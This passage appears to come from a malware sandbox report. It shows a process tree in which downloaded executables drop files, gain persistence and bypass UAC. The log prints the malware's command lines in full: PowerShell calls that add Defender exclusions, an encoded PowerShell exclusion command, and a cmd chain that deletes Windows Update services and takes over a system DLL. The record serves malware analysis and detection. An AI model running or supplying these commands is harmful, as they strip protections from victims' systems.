                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3404
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\comsurrogateBrowserdriverperf\BtVodw8a4RVIKk59rC9t7hmg.vbe"
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                PID:3104
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\comsurrogateBrowserdriverperf\9ieqWfsYK1ScBd.bat" "
                                                                                                                  4⤵
                                                                                                                    PID:3012
                                                                                                                    • C:\comsurrogateBrowserdriverperf\mscontainer.exe
                                                                                                                      "C:\comsurrogateBrowserdriverperf\mscontainer.exe"
                                                                                                                      5⤵
                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                      • UAC bypass
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • System policy modification
                                                                                                                      PID:2244
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\comsurrogateBrowserdriverperf\mscontainer.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3064
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\chrome.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1720
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dllhost.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4740
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\dllhost.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3060
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office16\winlogon.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:952
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Idle.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2392
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\TextInputHost.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2712
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Globalization\Sorting\dwm.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4700
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\dwm.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5008
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\comsurrogateBrowserdriverperf\RuntimeBroker.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3492
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Videos\StartMenuExperienceHost.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2532
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\csrss.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1028
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Speech\Idle.exe'
                                                                                                                        6⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1456
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bcBTp5Ga76.bat"
                                                                                                                        6⤵
                                                                                                                          PID:2396
                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                            7⤵
                                                                                                                              PID:748
                                                                                                                            • C:\Windows\PLA\Templates\dwm.exe
                                                                                                                              "C:\Windows\PLA\Templates\dwm.exe"
                                                                                                                              7⤵
                                                                                                                              • UAC bypass
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Modifies registry class
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • System policy modification
                                                                                                                              PID:3932
                                                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08130500-b462-46a3-addf-19b323933950.vbs"
                                                                                                                                8⤵
                                                                                                                                  PID:2268
                                                                                                                                  • C:\Windows\PLA\Templates\dwm.exe
                                                                                                                                    C:\Windows\PLA\Templates\dwm.exe
                                                                                                                                    9⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4988
                                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1426cfb8-ca0e-468c-9493-0e59bb93ac85.vbs"
                                                                                                                                  8⤵
                                                                                                                                    PID:3176
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:3896
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6080 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:5024
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6352 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4548
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2524
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6500 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:2212
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6468 /prefetch:8
                                                                                                                                2⤵
                                                                                                                                  PID:1684
                                                                                                                                • C:\Users\Admin\Downloads\brokercommon.exe
                                                                                                                                  "C:\Users\Admin\Downloads\brokercommon.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3584
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:1820
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5636 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:3048
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5980 /prefetch:8
                                                                                                                                      2⤵
                                                                                                                                        PID:3468
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
                                                                                                                                        2⤵
                                                                                                                                          PID:4544
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6164 /prefetch:8
                                                                                                                                          2⤵
                                                                                                                                            PID:2196
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6332 /prefetch:8
                                                                                                                                            2⤵
                                                                                                                                              PID:2344
                                                                                                                                            • C:\Users\Admin\Downloads\fud_dc.exe
                                                                                                                                              "C:\Users\Admin\Downloads\fud_dc.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3840
                                                                                                                                              • C:\Users\Admin\Downloads\fud_dc.exe
                                                                                                                                                "C:\Users\Admin\Downloads\fud_dc.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:548
                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                  cmd /c echo %temp%
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2204
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\INST.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4996
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\INST.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\INST.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Modifies WinLogon for persistence
                                                                                                                                                        • UAC bypass
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        • System policy modification
                                                                                                                                                        PID:3028
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\INST.exe'
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:636
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\INST.exe'
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:3924
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\SubsetList\INST.exe'
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1328
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\Idle.exe'
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1780
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\INST.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\INST.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:1476
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4436
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6024 /prefetch:8
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4312
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6556 /prefetch:8
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1924
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
                                                                                                                                                        2⤵
                                                                                                                                                          PID:752
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6644 /prefetch:8
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3512
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,14140840981848022782,5442497163556658129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5600 /prefetch:8
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4348
                                                                                                                                                            • C:\Users\Admin\Downloads\full.exe
                                                                                                                                                              "C:\Users\Admin\Downloads\full.exe"
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:4320
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAGMAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHkAdQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBnAHMAagAjAD4A"
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2988
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3348
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:372
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:4964
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:548
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop bits
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:1296
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:3892
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:2784
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:2348
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies security service
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:3544
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:1932
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:3996
                                                                                                                                                                  • C:\Windows\system32\takeown.exe
                                                                                                                                                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:2948
                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                    PID:4060
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:1548
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:4976
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:2476
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Modifies registry key
                                                                                                                                                                    PID:4492
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2976
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:4944
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3324
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4256
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2188
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1512
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:372
                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                C:\Windows\System32\conhost.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                PID:3688
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
